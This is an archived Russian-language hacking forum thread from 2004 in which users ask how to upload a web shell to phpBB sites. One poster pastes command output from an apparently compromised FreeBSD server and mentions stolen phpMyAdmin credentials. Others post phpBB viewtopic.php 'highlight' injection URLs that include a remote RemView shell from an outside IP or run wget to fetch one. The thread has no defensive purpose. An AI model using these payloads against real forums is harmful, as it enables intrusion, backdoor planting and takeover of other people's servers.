PDA

Просмотр полной версии : Как залить шелл через PhPBB


SheFF
24.11.2004, 03:00
Народ здрасти всем! Может всётаки раскажите от и до как же всётаки залить шелл на phpbb
Что то я так и немогу допереть.
НУ вот например что у меня получилоьс


uid=1001(www3) gid=4294967295 FreeBSD main.ntline.local 4.9-RELEASE-p11 FreeBSD 4.9-RELEASE-p11 #0: Tue Aug 3 11:32:37 EEST 2004 scruff@main.ntline.local:/usr/src/sys/compile/main i386 total 760 drwxr-xr-x 2 www3 www3 1024 May 30 00:40 admin drwxr-xr-x 2 www3 www3 512 May 30 00:40 cache -rwxr--r-- 1 www3 www3 5051 Jul 20 2003 common.php -rwxr--r-- 1 www3 www3 267 Nov 23 18:27 config.php drwxr-xr-x 2 www3 www3 512 May 30 00:40 db drwxr-xr-x 2 www3 www3 512 May 30 00:40 docs -rwxr--r-- 1 www3 www3 810 Jul 20 2003 extension.inc -rwxr--r-- 1 www3 www3 3596 Jul 20 2003 faq.php -rwxr--r-- 1 www3 www3 45540 Dec 30 2003 groupcp.php drwxr-xr-x 4 www3 www3 512 May 30 00:40 images drwxr-xr-x 2 www3 www3 1024 May 30 00:40 includes -rwxr--r-- 1 www3 www3 14332 Jul 20 2003 index.php drwxr-xr-x 3 www3 www3 512 May 30 00:40 language -rwxr--r-- 1 www3 www3 6864 Jul 20 2003 login.php -rwxr--r-- 1 www3 www3 12102 Jul 20 2003 memberlist.php -rwxr--r-- 1 www3 www3 37609 Jul 26 2003 modcp.php -rwxr--r-- 1 www3 www3 34208 Jul 20 2003 posting.php -rwxr--r-- 1 www3 www3 72513 Dec 30 2003 privmsg.php -rwxr--r-- 1 www3 www3 3719 Jul 20 2003 profile.php -rwxr--r-- 1 www3 www3 42402 Nov 24 2003 search.php drwxr-xr-x 3 www3 www3 512 May 30 00:40 templates -rwxr--r-- 1 www3 www3 23138 Jul 20 2003 viewforum.php -rwxr--r-- 1 www3 www3 7232 Jul 20 2003 viewonline.php -rwxr--r-- 1 www3 www3 45009 Jul 20 2003 viewtopic.php drwxr-xr-x 2 www3 www3 512 May 30 00:40 zcontrib drwxr-xr-x 3 www3 www3 512 May 30 00:40 zinstall )\b#i

ну а также есть логин и пароль к пхпмойадмин. Но мля не мемогу найти путь к пхпмойадмин чтобы войти суда. Да мне впринцепе туда и ненадо покамись. мне бы на фтп попасть.
Очнь сильно прошу расказать метод как заливать Шелл.

x000d
24.11.2004, 16:36
для того чтобы шелл залить используй команды fetch , wget взависимости от того какая сис-ма.

SheFF
24.11.2004, 23:50
Где лю этих командах можно почитать чайнику?

PEPSICOLA
28.11.2004, 09:01
Гыыыы.. .я тоже чё то не нашёл :) Хотел найти ответ типа на этот вопрос.
Тока немного подругому...
Допустим у меня есть dbname, dbuser, dbhost, dbpasswd...
Как писать команду что бы залить remview?
Допустим RemView сейчас находиться на сайте...
http://123.123.123.123/remview.php

То получается мне надо залить его так?:

http://[Target]/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527

Правильно? нЭ?

Dainur
29.11.2004, 00:05
А как потом к Post Reply обратиться?(как его запустить)

PEPSICOLA
29.11.2004, 01:25
Вот там в двух коментариях написано одно и тоже.

Залить шел
viewtopic.php?p=123&highlight=%2527.$poster=
%20wget%20-O%20 имя шела %20http://шел .php %60.%2527

(c)Unnamed =)

Я пробовал - тож не получается.
Dainur, а зачем к Post Reply обратиться? Он поидее должен заливаться либо в директорию forum/ либо фиг знает куды =)